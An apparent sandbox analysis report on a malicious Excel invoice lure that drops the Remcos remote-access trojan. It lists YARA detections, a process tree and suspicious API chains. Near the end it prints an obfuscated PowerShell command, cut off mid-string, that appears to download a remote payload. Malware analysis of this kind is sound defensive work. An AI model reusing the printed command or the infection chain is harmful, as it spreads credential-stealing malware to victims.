                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E5A814_2_0043E5A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004387F014_2_004387F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043797E14_2_0043797E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004339D714_2_004339D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044DA4914_2_0044DA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00427AD714_2_00427AD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041DBF314_2_0041DBF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00427C4014_2_00427C40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00437DB314_2_00437DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00435EEB14_2_00435EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043DEED14_2_0043DEED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00426E9F14_2_00426E9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_1001719414_2_10017194
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_1000B5C114_2_1000B5C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B04015_2_0044B040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043610D15_2_0043610D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044731015_2_00447310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044A49015_2_0044A490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040755A15_2_0040755A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043C56015_2_0043C560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B61015_2_0044B610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044D6C015_2_0044D6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004476F015_2_004476F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B87015_2_0044B870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044081D15_2_0044081D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041495715_2_00414957
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004079EE15_2_004079EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407AEB15_2_00407AEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044AA8015_2_0044AA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00412AA915_2_00412AA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B7415_2_00404B74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B0315_2_00404B03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044BBD815_2_0044BBD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404BE515_2_00404BE5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404C7615_2_00404C76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00415CFE15_2_00415CFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416D7215_2_00416D72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D3015_2_00446D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D8B15_2_00446D8B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00406E8F15_2_00406E8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040503816_2_00405038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041208C16_2_0041208C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004050A916_2_004050A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040511A16_2_0040511A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043C13A16_2_0043C13A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004051AB16_2_004051AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044930016_2_00449300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040D32216_2_0040D322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A4F016_2_0044A4F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043A5AB16_2_0043A5AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041363116_2_00413631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044669016_2_00446690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A73016_2_0044A730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004398D816_2_004398D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004498E016_2_004498E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A88616_2_0044A886
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043DA0916_2_0043DA09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00438D5E16_2_00438D5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00449ED016_2_00449ED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041FE8316_2_0041FE83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00430F5416_2_00430F54
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004050C217_2_004050C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004014AB17_2_004014AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040513317_2_00405133
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004051A417_2_004051A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040124617_2_00401246
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040CA4617_2_0040CA46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040523517_2_00405235
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004032C817_2_004032C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040168917_2_00401689
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402F6017_2_00402F60
                Source: August Shipment - Inv No. 041.xlsOLE indicator, VBA macros: true
                Source: ~WRF{25DA551D-57C7-4B7F-89C3-ACFA37B5F42F}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                Source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3264, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 3008, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F3AD743.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: bhvB5B9.tmp.15.drBinary or memory string: org.slneighbors
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@17/33@10/5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,15_2_004182CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,14_2_0041798D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,15_2_00418758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,14_2_0040F4AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,14_2_0041B539
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_0041AADB
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\C9730000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-O0U3JA
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR890C.tmpJump to behavior
                Source: August Shipment - Inv No. 041.xlsOLE indicator, Workbook stream: true
                Source: C9730000.0.drOLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P.....................p.......}y.........................s............h...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P.....................p........y.........................s............h...............................Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.505829844.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: RegAsm.exe, 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? 